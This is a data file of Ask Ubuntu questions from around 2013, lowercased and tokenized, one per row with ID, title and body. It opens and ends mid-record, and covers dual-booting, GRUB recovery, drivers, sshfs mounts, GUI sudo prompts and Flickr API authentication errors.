‘/tmp/mkinitramfs_8gjkwq//lib/modules/3.8.0-25-generic/kernel/drivers/net/ethernet/brocade/bna/bna.ko’ : input/output error cp : reading ‘/lib/modules/3.8.0-25-generic/kernel/drivers/scsi/libfc/libfc.ko’ : input/output error cp : failed to extend ‘/tmp/mkinitramfs_8gjkwq//lib/modules/3.8.0-25-generic/kernel/drivers/scsi/libfc/libfc.ko’ : input/output error cp : reading ‘/lib/modules/3.8.0-25-generic/kernel/drivers/scsi/advansys.ko’ : input/output error cp : failed to extend ‘/tmp/mkinitramfs_8gjkwq//lib/modules/3.8.0-25-generic/kernel/drivers/scsi/advansys.ko’ : input/output error cp : reading ‘/lib/modules/3.8.0-25-generic/kernel/drivers/scsi/be2iscsi/be2iscsi.ko’ : input/output error cp : failed to extend ‘/tmp/mkinitramfs_8gjkwq//lib/modules/3.8.0-25-generic/kernel/drivers/scsi/be2iscsi/be2iscsi.ko’ : input/output error cp : reading ‘/lib/modules/3.8.0-25-generic/kernel/drivers/scsi/bnx2i/bnx2i.ko’ : input/output error cp : failed to extend ‘/tmp/mkinitramfs_8gjkwq//lib/modules/3.8.0-25-generic/kernel/drivers/scsi/bnx2i/bnx2i.ko’ : input/output error bus error ( core dumped ) depmod : ../libkmod/libkmod-elf.c:207 : elf_get_mem : assertion `offset < elf- > size ' failed . aborted ( core dumped ) i am not a techie but i need your support to resolve this without re-installation from scratch ... .
314393	how to access previous ubuntu wubi installation	i installed ubuntu/wubi nearly a year ago on my windows 8 pc . it has been sitting on a separate partition untouched since then . i am trying to access it again as i 'd like to use ubuntu now . i can not figure out how to boot to ubuntu . when i go to msconfig '' - > boot . i only see an option for windows . the ubuntu file hierarchy looks like this : d : \ - > ubuntu - > disks , install , winboot the disk file root.disk is about 18gb . any help is greatly appreciated .
314395	proper way to let user enter password for a bash script using only the gui ( with the terminal hidden )	i have made a bash script that uses kdialog exclusively for interacting with the user . it is launched from a `` .desktop '' file so the user never sees the terminal . it looks 100 % like a gui app ( even though it is just a bash script ) . it runs in kde only ( kubuntu 12.04 ) . my only problem is handling password input securely and conveniently . i ca n't find a satisfactory solution . the script was designed to be run as a normal user and to prompt for the password when a sudo command is first needed . in this way , most commands , those not requiring sudo rights , are run as the normal user . what happens ( when the script is run from the terminal ) is that the user is prompted for their password once and the default sudo timeout allows the script to finish , including any additional sudo commands , without prompting the user again . this is how i want it to work when run behind the gui too . the main problem is that using kdesudo to launch my script , which is the standard gui way , means that the entire script is executed by the root user . so file ownerships get assigned to the root user , i ca n't rely upon ~/ in paths , and many other things are less than ideal . running the entire script as the root user is just a very unsatisfactory solution and i think it is a bad practice . i appreciate any ideas for letting a user enter the sudo password just once via gui while not running the whole script as root . thanks .
314397	how to replace easypeasy partition with lubuntu	i have acer netbook with dual boot , window 7 and easy peasy . i want to replace easypeasy partition with lubuntu so that i have dual boot of window 7 and lubuntu . please let me know how can do it .
314402	dual boot win 7 ( pre installed ) and ubuntu 12.04	friends i am new to ubuntu forum . please guide me installing ubuntu alongside win 7 ( preinstaled ) . i want to run both operating system for now . please walk me through all the steps to be carried out to install . i will be great full to everybody . thankyou people .
314404	how write bengali `` aa '' ?	i 've added bengali keyboard in ubuntu 12.04 . every button in the keyboard has 2 character . pressing shift + any button , writes the upper character in the button . but i 'm unable to write the following character shown in the picture . can anyone please help me showing which key combination is required to write this character ?
314408	is my hdd going to fail ?	i recently ran the gsmartcontrol utility and got back this report . i 'm very worried , does this mean my hdd is about to fail ? http : //paste.ubuntu.com/5811763/
314419	i can not enable canonical partner and independent , why ?	on software and updates under other software tab , i want to enable canonical partner and independent , after i clicked the checkbox and input my password , the checkbox stay unchecked no matter how many times i try to click it , why ? i 'm on raring .
314424	secondary battery not found ?	i 've got a asus tx300 running ubuntu 13.04 . this is a laptop tablet hybrid which has secondary battery in the dock . this battery is not detected by ubuntu as far as i can see . ran this while docked : user @ tx300 : /sys/devices/platform $ dmesg |grep batt [ 1.691787 ] acpi : battery slot [ bat0 ] ( battery present ) also looked in /sys/class/power_supply/ and other tips i 've found , but there 's no trace of the extra battery . any help appreciated . edit : i ran the battery all the way down until the unit suspended . when i closed the lid after it hibernated the led indicator changed from blinking to static , indicating it was charging . when i woke up this morning it had indeed been charged by the secondary battery but it still does n't seem to be found by the os .
314427	software centre cant find the internet	i am running ubuntu 11.04 on vmware . i can access the internet fine with firefox but the software centre cant download anything and tells me to check my internet connection . using apt-get on the command line gives me errors like ... failed to fetch http : //archive.ubuntu.com/ubuntu/dists/natty-security/multiverse/binary-i386/packages 404 not found [ ip : 91.189.92.176 80 ] synaptic also reports similar problems . any ideas what is going wrong ?
314429	why is pkexec preferred over gksudo for graphical applications ?	please provide ubuntu documentation that refutes this : https : //help.ubuntu.com/community/rootsudo why , on my fully updated 13.04 system , does pkexec not function ? $ pkexec gedit somefile.txt no protocol specified ** ( gedit:13135 ) : warning ** : could not open x display can not open display : run '/usr/bin/gedit -- help ' to see a full list of available command line options
314433	acer c-7 chrome book	i am running 12.04 chrubutu and i like it . however , i am running 13.04 on my other netbooks and laptops and i heard that 13.04 is supported on the chrome books . i am would very much like to find out how to update my 12.04 chrubuntu to 13.04 . can someone lead me to a good source of instructions ? thank you so much !
314438	how to change background color in grub	i use ubuntu 12.04 . i want to change grub 's background color to black . i mean just background color , not background image . i can only find guides how to change the image . i tried some gui software which had an option to change the colors , but unfortunately grub just ignored those changes . i hope you can help me .
314440	how to allocate unallocated space of hard disk in ubuntu 12.4 after installation	how to allocate unallocated space of hard disk in ubuntu 12.04 after installation . my system is running fine with windows and linux . i am using windows rarely and for my official purpose i am using ubuntu 12.04 . i forgot to allocate around 100 gb of space while installing . now 100 gb is free in hdd and its not usable . how can i allocate that free space as another volume without formatting the current os ?
314444	sshfs with fstab : connection reset by peer	i am trying to allow my laptop ( ubuntu 13.04 ) to access my pc ( lubuntu 13.04 ) hard drive through sshfs . i 'm using rsa keys to connect . it works perfectly fine if i type this in the terminal : sshfs my-pc : /a_folder /media/a_folder but i would like it to be mounted automatically when i boot my laptop . so i added myself to the fuse group : sudo adduser mynickname fuse and i added the following line to my fstab file : sshfs # mynickname @ my-pc : /a_folder /media/a_folder fuse defaults , idmap=user , _netdev 0 0 when i boot the laptop , a_folder appears in the list of devices , but is not mounted . when i try to access it through nautilus , it displays the following error : mount : only root can mount sshfs # mynickname @ my-pc : /a_folder on /media/a_folder i get the same error if i try mount /media/a_folder in a terminal . if i try sudo mount /media/a_folder i get read : connection reset by peer i tried to add `` allow_other '' as an option in the fstab entry , and uncommented the related line in /etc/fuse.conf , but it did n't change anything . the user `` mynickname '' is the owner of the folder /media/a_folder and has rwx permissions . i looked at many threads on the internet about people with quite similar issues , but nothing worked so far . usually , people ca n't even do sshfs my-pc : /a_folder /media/a_folder without getting an error , whereas this works fine on my laptop . any insight and tips will be greatly appreciated ! thanks .
314447	how to delete failed install of ubuntu 12.10	i tried ubuntu 12.10 on an 2004 desktop computer and unity wo n't run on it . i installed along side xp . now i need to remove 12.10 and find a compatible linux destro which will work . need to say that i am inexperienced in linux ? thanks for any help .
314456	help setting up wireless in ubuntu 13.04	i 'm having problems connecting my wifi in ubuntu 13.04 . so i was wondering if filling in the data manually ie : the ipv4 , ipv6 , the ssid and bssid info etc . i did try this before but maybe i put in the wrong data or maybe not enough . would that make it work ? i just do n't know how to find out some of the data you need to put in ? i 'm new and it 's confusing . does anyone know the solution ? here is lspci : james @ james-mm061 : ~ $ lspci 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 01 ) 00:1c.3 pci bridge : intel corporation nm10/ich7 family pci express port 4 ( rev 01 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 01 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 01 ) 03:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) 03:01.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller 03:01.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) 03:01.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 0a ) 03:01.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 05 ) 0b:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) computer information : model : dell mm061 mobile intel ( r ) 945gm express chipset family [ display adapter ] ( 2x )
314457	set left handed mouse , then wacom stylus buttons switch too	i 'm using lubuntu 12.04 . i can set my mouse ( basic usb mouse ) to left hand ( i.e . switch the left and right mouse buttons which is all i need ) by going into preferences / keyboard and mouse . however , it changes my wacom stylus , so that when the tip touches the tablet it acts like the right mouse button , making it impossible to draw . is there a way to have both happen at once ? the stylus buttons working in right handed configuration , while the mouse works in left handed configuration ? thanks for any help/suggestions .
314461	graphics on boot split into three sections	i just installed 13.04 onto a new laptop because of the ease of install with the uefi bios . when i boot the system though , the screen is split into three sections each about 640x200 at the top of the screen , with the active terminal mirrored across them . although i can login , startx fails due to something about a file . i have tried booting with vga=711 and normal nomodeset with no success . booting the live usb i originally installed from results in the same issue . the graphics driver in the xorg.conf.something from what i can make out is set to vesa , but it could be set to some other four character value that is similar to vesa , hard to tell . how can i fix this ? one thing to note , the laptop has two dedicated gt 750m 's , along with the intel 4000 built into the processor . this is what it looks like , the purple box is what the grub2 menu was in before boot .
314462	help with `` advanced '' shell scripting | how to create an image preview of a pdf	first of all , sorry for my english : i 'm not british/american . here is my problem . i 've got a folder named pdf with lots of files pdf inside it . i 've got another folder named thumbnail , which is empty . i want to create jpg images preview of each pdf to use them in my html webpages as previews of the pdf . to do this i 'm using a software called imagemagick . i tried to put the code inside my php files to get the purpose , but it does n't work . as you understood , i have created a small search engine with apache , mysql to search for pdf locally ( offline ) . now i want to add a `` preview '' of the first page of pdfs . instead , it works by bash command line and the code is : convert pdf/name_of_the_file_pdf.pdf [ 0 ] name_of_the_imagefile.jpg ( the zero stands for that the image is taken from the first page of pdf ) how can i make a script that takes each name of pdf files and put it into that code ? ? ? ? to list all the file , i did ls > pdf but with the little knowledge i have i ca n't go further ... . some pdf 's names contain spaces ... .is that a problem ? pdf files are so many that i ca n't do the task typing every name , it would n't be a nice and clever work ! ! ! ! thanks a lot in advance ! ! !
314469	why will rhythmbox not add or import songs since 13.04 install ?	since i installed 13.04 ubuntu ( 12.04 before ) i have not been able to add or import music to either of my ipods ( 4th & 5th generation ) . i can play music with rhythmbox . rhythmbox recognizes ipods . can not drag or import without crashing . no error codes . have tried most variations of preferred format . i have spent many many hours research , including ask ubuntu . any new suggestions ? db
314471	why does ubuntu take so long to boot ?	i 'm having really slow boot times . i do n't know what 's going on with my computer , i did a fresh install of ubuntu 12.04.2 and my boot time is really slow . how can i speed it up ? this is the boot chart . bootchart my computer specs : lenovo ideapad u310 intel core i5-3317u - 1.7 ghz ( 2.6 ghz max freq ) 500gb hdd - 5400rpm 4gb ram intel速 hd 4000 ( integrated )
314481	when opening new terminal window , how to tell it to open full screen ?	just as in the title . i find myself often opening new terminal window ( not tab ) from terminal . is there a way to specify so that the new window opens maximized ? i looked at -geometry option , but only found a way to set the offsets with it , and not how to tell it to me maximized .
314482	network interface not config in 12.04 lst usb boot	booting 12.04 lst from usb 0n toshiba laptop built with universal-usb-installer-1.9.3.6 from 12.04.2-desktop-amd64 on windows 8 lspci returns : 01:00 ethernet cntrl `` atheros `` gigabit ethernet 02:00 network cntrl `` realteck `` device 8723 realteck is the wireless pci device iwconfig returns : l0 ... . missing the above ( ie . no eth ( n ) & wlan ( n ) )
314485	unity webapp not working with chromium ( 13.04 )	i usually use the unity webapps integration with chromium , but today after an fresh ubuntu intallation the webapps does n't work . what can i do to make an log of it or something like that to find out ?
314492	dual-boot problem	i have a hp laptop that originally had windows 7 os on it , i partioned the drive and allocated 100gb ( est . ) for the ubuntu install . the install went fine i have ubuntu and windows 7 still on the computer . but i can not get the os boot screen to show ubuntu as an os . i can while start up pull up the start menu screen via esc . key and press f9 for boot device options and get the boot manager screen and it lists ... os boot manager , ubuntu ( hitachi hts 543232a7a384 ) , boot from efi file , and notebook hard drive ... i can boot ubuntu from this screen by selecting ubuntu . but i would like to make it easier to access . the computer boot is not for myself otherwise it would not be a problem i would remove windows altogether . i would like to make it basically `` user friendly '' if that 's at all possible and make the os boot screen show ubuntu as a bootable os as well as windows 7. on the boot selection screen . any help on this issue would be greatly appreciated , i 've looked to see if i could find the answer and maybe i 've overlooked something so here i am . like i said i need it to be as user friendly as possible and force the user to choose windows 7 or ubuntu not send them into one or the other without them being allowed to choose . i can get any information you might need if necessary but i dont know exactly what you 'll need other than what i 've given . ubuntu version is the 13.04 just so you know .
314494	ubuntu appears very small at 1080p , text almost undreadable	alright ... so i have a 15 '' dell studio xps with a 1080p screen . everything seems really small with 1080p , in 720p everything is fine but just looks very low-res . so i definitely want to get the full resolution the display can give me but do n't want everything so small . help ? ? edit : well , yes higher resolution means more pixels . but it should n't mean fonts the size of of 7 in ms word , and web pages looking like their at 50 % ... i 'm not saying windows is better , but windows did not appear miniature at 1080p .
314495	why did canonical choose mir over wayland as the display server ?	i like to know , what are the advantages of mir .
314497	unseen process using up all the memory ?	i 'm running low on memory here : $ free -h total used free shared buffers cached mem : 1.9g 1.9g 83m 0b 28m 394m -/+ buffers/cache : 1.4g 506m swap : 2.9g 705m 2.2g yet top is showing that the only high-memory process running was java ( netbeans ) : ( i used f key to select fields , sort by mem % ) % cpu ( s ) : 1.0 us , 1.0 sy , 0.0 ni , 96.2 id , 1.7 wa , 0.0 hi , 0.2 si , 0.0 st kib mem : 2031108 total , 1946956 used , 84152 free , 29080 buffers kib swap : 3063548 total , 722128 used , 2341420 free , 404272 cached pid user pr ni virt res shr s % cpu % mem time+ command 12825 username 20 0 2309m 704m 18m s 0.0 35.5 19:18.90 java 1488 root 20 0 339m 54m 19m s 0.3 2.7 25:32.13 xorg 3442 username 20 0 1098m 45m 8416 s 0.7 2.3 6:08.10 unity-panel-ser 22568 www-data 20 0 353m 32m 24m s 0.0 1.7 0:00.82 apache2 22855 www-data 20 0 353m 31m 23m s 0.0 1.6 0:00.34 apache2 so what could be taking up memory here ? on ubuntu 13.04 .
314498	unable to activate workspaces ccsm / dash / dconf ubuntu 13.04	i ran the latest updates and as usual i had to re-install my video driver , download the headers and blah blah ... i ran into a few troubles that i was able to fix and at the end i got my ubuntu up and running , unity working , opengl working without a single problem ... games running fine but wait . i have only 1 worspace ! oooh no problem , lets ccsm to fix that ... nope it has no effect . well , we can activate the workspaces on dash -- > appearance ... nope , nothing happends . oooooh yea , the dconf editor ! ! i will force those workspaces thru that method aaaaaand : / nothing once again . : ( maybe im missing something , maybe i missed something in this forum ... but i cant find a way to fix those worspaces . i can only have 1 and thats it . does anyone had thtis problem before ? can i has my workspaces back ? i only need 4 : (
314499	ubuntu wont write a win7 iso to a usb	i 'm trying to find a program or terminal code that can write a 3.1 gb windows 7 installer file to a 32 gb usb3+ flash stick . i have tried the startup disk creator but it wo n't select the windows installer file . any suggestions that i could use ? ( i 'm new to ubuntu )
314502	how do i run microsoft explorer 8 plus on ubuntu ?	first off , you should know i 'm a ubuntu newbie who has become passionate since my strangely low-priced dell computer showed up with ubuntu loaded on it and it could do almost everything i need from a computer . but now i 've got a problem . i know , it 's like asking how to use a cassette player on your computer , but in south korea every website is made to work with exclusively on ms explorer plus active x , which microsoft finally killed with 9 . hence , i have to use 8 , as there are some korean sites i need to access for searching , banking , etc . so i see that the way to go is to load playonlinux , but then i it tells me to delete these . do i really have to do that ? should i just hit `` install anyway '' ? or would that be just asking for trouble ?
314504	netstat -ln output on an ec2 instance ( ubuntu ami )	when i run netstat -l , my output is : proto recv-q send-q local address foreign address state tcp6 0 0 127.0.0.1:8080 : : : * listen what does the foreign address section means here ? my expectation is for this server to listen from any host
314507	gromacs 4.6 in ubuntu	is gromacs 4.6 available in the ubuntu software center ? i have had a look but i could not find it . please somebody lead me the latest version gromacs 4.6 . many thanks
314509	how to correct google earth 's `` invalid http request '' notice ?	i am running ubuntu 12.04 . as you might know google earth 7 does n't work in ubuntu 12.04 yet . i installed google earth via make-googleearth-package -- force command . my installation was successful . at the beginning everything was working fine . but after some days i had a problem . when i type in `` fly to '' box a city i wanted to search for it . it gives me `` invalid http request '' error as seen in the picture : how to solve ? p.s : i removed and reinstalled it but problem still persists . i can search globe via mouse only .
314514	ubuntu grub disappeared after installing windows 8.1 preview	i was dual-booting windows 8 and ubuntu and after installing windows 8.1 preview two days back , i am no longer getting the option to boot into ubuntu in the start screen . please help ! my thesis is due in a few weeks . and all my work is in the ubuntu . best
314522	how to disable large cursor after installing ubuntu with accessibility option on ( high-contrast , .. )	while installing ubuntu , i accidentally hit the high contrast option . i could not figure out how to disable it within the install , so i let it complete . i booted up into ubuntu 13.04 and high contrast was still on . i disabled it in universal access , and now am noticing my mouse cursor is huge in web browsers . this is very much a stock install . is there a setting to disable the huge mouse ? i mean the thing is 4 times the size of text etc on normal pages . looks like it 's in everything with text.. terminal , app store , folders and files ...
314527	ati x1400 12.04 os can not see that it is a sepparate video card	ubuntu not only can not see that it is not a `` vga compatible device '' but when trying to install propietary drivers , amd installer asks to use the -- iscurrentdistro ( cant find in google how to use this switch ) for install . need assistance , tried running google earth and it really looks software rendered using fglrx thanks much !
314530	how do i get drivers for the web cam on my toshiba satellite c855 ?	i am a new user to ubuntu ( and linux for that matter ) . i am aware that a lot of my drivers and controls for the computer hardware did not re-install once i loaded ubuntu . i am curious if drivers exist for my web cam that will work with this platform and how can i install them ?
314533	audio playback issues in 12.10 : mic feeds back through the headphones , but i ca n't hear any other audio	i had a system crash yesterday , and ever since then my audio playback is n't working any more in 12.10 . i 've gone through several of the steps outlined in restoring audio ( i see that it 's a common problem ) and i 've also tried uninstalling and reinstalling pulseaudio . the odd thing is i 'm getting a lot of white noise through the headphones and when i unmute my mic i can hear what i 'm saying through the headphones . it all worked perfectly fine up until the system crash . i 'm wondering if the crash is related to my video card . it 's a 5870 and i 've been trying to use the proprietary drivers . perhaps sound has been routed to the hdmi cable ? alsamixer says everything is unmuted and the volume levels are appropriate .
314535	how do i move 'home ' to the main ubuntu partition	i am completely new to linux and ubuntu 13 . so far , i 'm loving it . the writers really tried to think of everything , and have done a good job of keeping the o/s modern . nonetheless , it is still a bit of a learning curve to me . i have some experience using a terminal from os x , but i 'm still learning my way around and how things are done . so to anyone who answers , please assume i know nothing , and explain each step . during the o/s installation , i chose to place my 'home ' on a separate partition . i did this so i could use this space as portable area where i could store frequently accessed files , use it to transfer stuff between o/s 's , and be able to retrieve them easily in an emergency . i formatted this partition using xfs , thinking it was an acronym for exfat file system , an ideal cross-platform fs which supports files larger than 4gb . doh ! turns out xfs is a somewhat obscure journaled , server fs . also turns out 'home ' likes to live in a fs that supports permissions , so that rules out exfat anyway . ok so that was a learning experience , but now i want to move 'home ' back to the partition which ubuntu is installed on , and reformat the xfs partition to something else ( decide later ) . i read a few related questions here on ask ubuntu , but i did n't get anywhere . either because there were some differences in my situation or version , or i got unexpected results , or i simply did n't know what i was doing . any help would be much appreciated .
314536	is onboard graphics enough for running ubuntu 12.04 ?	i have a laptop with core i3 processor and onboard graphics , 4gb ram , desktop with core2duo processor , onboard graphics , 2gb ram . i want to install ubuntu 12.04 on my desktop currently running windows xp on it . is configuration enough to run ubuntu 12.04 on desktop ? though i can install it on my laptop too but i would prefer to do it on desktop .
314541	need to give swap space as did n't give it while installation	i did not provide swap space while installing ubuntu . how shall i give the swap space now ? i 've a multibooted system with win xp and ubuntu . please help
314542	about ubuntu as server and configuring ip tables	please help me to setup a linux based server machine for sharing internet connection in my network . since i am a new user , please assist me ...
314549	vmware esx / vsphere alternatives supporting linux clients	i want to setup a vm server and by my previous experience , the first thing that came to my mind was the `` vmware esxi '' hypervisor . to use esxi you need the client application , called `` vsphere '' to connect and manage your vms remotely . unfortunately vsphere is only published for microsoft windows and has no linux version . so my question is , what alternatives do i have instead of vmware esxi that provides similar functionality and supports linux ? are there any free/open-source hypervisors similar to esx , where they have client applications for both linux and windows ? i 've also heard from a few people that there is a product based on kvm by redhat , but i do n't have any info on it .
314551	run a command after a specific usb was plugged in	i want my usb to run a command or a script -- like autorun -- when it is plugged in . i 've also searching and found out that autorun was not present because of some security reason ( s ) . how do you run a command after a specific type of usb is plugged in ?
314553	windows boot loader does not detect ubnutu	i installed ubuntu 13.04 along side windows 7 . however , after installation was complete and the computer restarted i could not see ubuntu in the operating system load choice . i had windows 7 initially and 3 drives c , d and e before i installed ubuntu . i deleted e : partition and installed ubuntu in the unallocated space . windows boot loaded does not detect ubuntu 13.04. please help
314559	how to turn on the vga display without using the function keys	it is a well documented issue about some of the function keys not working on laptops . i am having the same issue with my display function key i.e . the key that is used to switch to turn on the vga output . my question is , if we can not get the function key to work , what is a way to do the task manually ? for some background to this question , please see this .
314561	why is my fan constatnly blowing in ubuntu ?	i have installed ubuntu 13.04 ( 64-bits ) alongside windows 7 on different partition on my second desktop . it 's working nice . i have updated everything . however , i have problems with my fan . it 's blowing non-stop and very fast ( loud ) . i have n't these problems in windows 7 where it works nicely . how to update drivers for my fan or something else ? my desktop is : hp pro 3410 microtower pc . graphic card : amd radeon hd 6570 board : 2a9c 1.1 bus clock : 133 megahertz bios : american megatrends inc. 6.14 11/05/2010 processor : 3,20 gigahertz intel core i3 550 drivers i have tried for my graphic card : i have tried these drivers so far : xserver-xorg-video-ati , version : 1:7.1.0-0ubuntu2 fglrx version : 2:9.010-0ubuntu3 fglrx-updates version 2:9.012-0ubuntu1 but the fan is still blowing like a maniac . i have tried to install linux mint 15 previously and i have had the same problems with the fan . any idea how to fix it ?
314566	where can i setup scrolling speed in ubuntu 13.04 ?	i can not find where i can setup mouse-wheel scroll speed in ubuntu . it 's not available in mouse settings for me . could you give me some hint where to find it ? right now the scrolling is very rough in big `` steps '' not smooth at all . the scrolling of mouse wheel is incredible fast and i am unable to slow it down . it 's present in system and browsers as well .
314567	which windows 8 partition should i use ?	i installed ubuntu as a 2nd operating system , and grub found two windows 8 boot partitions ( one of them is 350mb , which was reserved by windows , and another where i installed windows ) . which of these partitions is more correct to use for booting windows ?
314568	uninstall backtrack 5 dual booted with ubuntu	some days ago i installed backtrack over my ubuntu installation . i was having some problems in the bootloader of backtrack . so i set default bootloader to that of ubuntu . i did n't remember the command that i typed . so now the default bootloader is of ubuntu and i want to completely remove backtrack . how to do that ? if i just delete the installation files of backtrack from ubuntu then it 'll still be there in the bootloader .
314570	mute a microphone with a keyboard shortcut ?	i 'm using this method to mute the microphone in ubuntu 13.04 , however i 'm missing a visual representation that the action has taken place and is currently in action . is it possible to improve this method , or use another method , to have my microphone muted and know for sure that this has happened ? a microphone indicator would be enough , probably .
314571	ubuntu 13.4 does n't search for files on desktop when type a letter	when i trigger show desktop action and get a clear view of the desktop , i want to do fast search for some file eg . if file name is `` myname '' , i will type first letter `` m '' and file should be selected . all version of ubuntu did work like that but not 13.4 . how to get back that old good search ?
314577	have thunderbird run twice ( 2nd instance )	i would too have two instances of thunderbird on the same computer . the first one that would be a new one starting from now , meaning i would'nt have a lot of history . the second one would be for archive purposes only , and i would go there if i need to find older emails how is this possible in ubuntu 12.04 ?
314584	how to uninstall ubuntu 13.04	i was trying to install ubuntu 13.04 on a mini notebook acer , but an error occurred while almost completing the installation ... now it does n't charge , only if i enter the windows 7 partition.how do i start the process ? or can i uninstall the ubuntu to start again to install it ? thank you in advance for your answers .
314593	does ubuntu one effected by nsa according what edward snowden published ?	it is very important for me to keep my files in a safe host . i use ubuntu one because of ease of using in ubuntu . you think is it safe enough of spying ?
314598	problem viewing network on nautilus	windows machines are able to see shared folders on my ubuntu machines but the ubuntu machines can not consistently see any other machines through nautilus . under browse network , it shows the local machine , my wifi service , and the windows network . when i open the windows network , it shows the workgroup icon . when i open the workgroup icon , it shows the local machine and my wifi service again . i am using ubuntu 12.04 lts . after searching everywhere i could think of with no success , i found that if i run : sudo service nmbd restart in terminal whenever nautilus gets stuck , it is sometimes able to find shared folders again ... until it gets stuck and i have to repeat the process i do n't know why it works , and it 's not consistent . but frequently it seems to fix the problem temporarily . as suggested in some of the posts i read , i 've tried changing the workgroup name to all caps . and i added a netbios name , also all caps . to the /etc/samba/smb.conf file to no avail . i can get nautilus to see the machines if i use connect to server under the file menu and type the local ip address . i can also see them if i run nautilus smb : // [ ip address ] in the terminal . does anyone have any ideas ? please help . thanks .
314600	( alt ) and ( super ) keys suddenly stopped working in gnome 3	for my daily work i use two keyboard layouts : the normal german qwertz ( setxkbmap de ) as well as neo ( setxkbmap de neo ) . yesterday suddenly between switching back and forth between keyboard layouts [ alt ] and [ super ] stopped working normally for window switching and accessing the gnome shell overview using neo . more precisely with neo : when any window has focus pressing [ alt ] and [ super ] has no effect whatsoever ( neither [ alt ] - [ tab ] for application switching , [ alt ] -^ for window switching , or just [ super ] to get to the activities overview ) . if now window is open [ super ] works fine . the same goes for when i 'm in the activities overview . [ ctrl ] - [ alt ] - [ f1 ] etc . works unaffected . my system wide default keyboard layout is neo and i switch between keyboard layouts with setxkbmap de / setxkbmap de neo via a keyboard shortcut ( the calculator button ) . when i switch to qwertz everything works as expected . i did n't find anything interesting in /var/log/ { syslog , xorg.0.log , gdm/* } and as far as i can tell there were no package installations at the time the problem started . i also tried removing the cache files /var/lib/xkb/* to no avail . i 'd also be happy about hint 's how i can debug this phenomenon . as it it i 'm at loss with what could be the cause . edit : if found a workaround : after logging out and logging in again everything works ( my user get 's automatically logged in after boot ) .
314601	xubuntu 13.04 cant download magnets .	upgraded to xubuntu 13.04 and cant open click on magnet links any more . tried ktorrent instead of transmission . same thing . unable to detect the uri-scheme of `` magnet : ? xt=urn : btih:2418c7c1ad55d86b68ff807b3aac723c500d3f08 & dn=europa+report+2013+webrip+xvid-ptpower & tr=udp % 3a % 2f % 2ftracker.openbittorrent.com % 3a80 & tr=udp % 3a % 2f % 2ftracker.publicbt.com % 3a80 & tr=udp % 3a % 2f % 2ftracker.istole.it % 3a6969 & tr=udp % 3a % 2f % 2ftracker.ccc.de % 3a80 & tr=udp % 3a % 2f % 2fopen.demonii.com % 3a1337 '' .
314602	dual boot stuck on ubuntu	i recently dual booted my old windows xp with ubuntu 12 using the iso burned to a cd ( wubi ) . the installation worked like a dream but after rebooting i found there was no way of getting back to xp . after restarting the screen simply says `` out of range '' ( meaning what ? ) and anything from 10-30 seconds later goes straight to the linux login page . the bizarre thing is i can still access the windows drive from inside ubuntu , but any microsoft/windows specific products wo n't open . i 'm not sure grub is working properly either . ubuntu is great to have but i wanted the choice on booting up , not being locked out windows as this machine is . please advise .
314609	my screen is distorted while installing ubuntu 12.04	i ca n't install ubuntu 12.04 on my desktop . after i boot the liveusb ( a bootable from yumi ) when i enter install the screen is distorted and i ca n't install .
314610	grub rescue help	i tried to delete an ubuntu partition and now i cant access either of my operating systems . i have tried several different commands and none of them worked . i always got the unknown filesystem error with every attempt .
314611	how to save the krusader password and bookmarks	im using ubuntu 12.04 on my system and i need to reinstall the os because of some graphical problems . so i need to make a backup of all the bookmarks and wallet passwords of krusader . and also i need to save the bookmarks of konsole but i found no option to save passwords and bm in both konsole and krusader . and if backup succeeded then how to restore them after os installation ? ?
314616	access to guest for internal drive partitions	in ubuntu guest user can access internal drive partitions only after entering the password of admin but after that guest have access to all drives . is their is any way to set system in such a way that guest can access some partitions only not all partition of drive ?
314618	reusing flickr ubuntu account with flickrapi	i am trying to develop a small python tool to interact with my flickr account . i want to keep it simple so i decided to use the flickr account i already have configured in my system ( online accounts framework ) . i have studied the online accounts for application developers tutorial and was able to get my flickr account details . the problem appeared when i tried to use the flickrapi module . i have tried the latest version from and as well as the version available via apt in 13.04 . the api has changed a bit , but both tries ended with a message that i have an invalid oauth token . this is what i have tried : latest source from flickrapi hg repo import flickrapi flickr = flickrapi.flickrapi ( u '' d87224f0b467093b2a87fd788d950e27 '' , u '' 4c7e48102c226509 '' , token=flickrapi.auth.flickraccesstoken ( u '' my_token '' , u '' my_token_secret '' , u '' write '' , u'dargad ' , u'dargad ' , u'user_nsid ' ) ) flickr.test.login ( ) which leads to : error : flickrapi.auth.oauthflickrinterface : do_request : status code 400 received , content : error : flickrapi.auth.oauthflickrinterface : oauth_problem=parameter_absent error : flickrapi.auth.oauthflickrinterface : oauth_parameters_absent=oauth_token version from apt-get ( 1.2-3 ) import flickrapi flickr = flickrapi.flickrapi ( `` d87224f0b467093b2a87fd788d950e27 '' , `` 4c7e48102c226509 '' , token= '' my_token '' ) flickr.test_login ( ) results with flickrerror : error : 98 : invalid auth token . i have also tried different combinations of flickrapi constructor flags ( e.g . store_token , 